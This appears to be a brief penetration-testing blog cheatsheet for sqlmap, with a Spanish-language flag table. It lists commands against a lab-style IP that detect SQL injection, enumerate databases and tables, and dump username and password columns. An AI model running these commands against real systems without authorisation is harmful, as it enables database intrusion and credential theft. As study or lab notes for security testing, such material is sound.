SQLMap

SQLMap Cheatsheet

Check if injection exists

sqlmap -r Post.req
sqlmap -u http://10.10.10.10/file.php?id=1 -p id  
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin"

Get database if injection Exists

sqlmap -r login.req --dbs  
sqlmap -u http://10.10.10.10/file.php?id=1 -p id --dbs  
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" --dbs

Get Tables in a Database

sqlmap -r login.req -D dbname --tables  
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname --tables  
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -D dbname --tables

Get data in a Database tables

sqlmap -r login.req -D dbname -T table_name --dump  
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name --dump  
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name --dump

Get Columns in a Table

sqlmap -r login.req -D dbname -T table_name --columns
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name --columns  
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name --columns

Get data in a Database columns

sqlmap -r login.req -D dbname -T table_name -C username,password --dump
sqlmap -u http://10.10.10.10/file.php?id=1 -p id -D dbname -T table_name -C username,password --dump
sqlmap -u http://10.10.10.10/login.php --data="user=admin&password=admin" -p user -D dbname -T table_name -C username,password --dump

Other parameters

Flag Description Example
–level <int> Aumenta los tipos de escaneo [1 - 5] –level 5
–risk <int> Aumenta el ruido y el rendimiento [1 - 3] –risk 3
–batch Acepta las preguntas con el valor por defecto automáticamente –batch
–string <string> Cadena de texto que aparece cuando la consulta es satisfactoria –string “Hola”
–not-string <string> Cadena de texto que aparece cuando la consulta no es satisfactoria –not-string “Error”

Escrito el 28-11-2021 a las 07:03 pm por creep33.

Tags:

Categories:

Updated: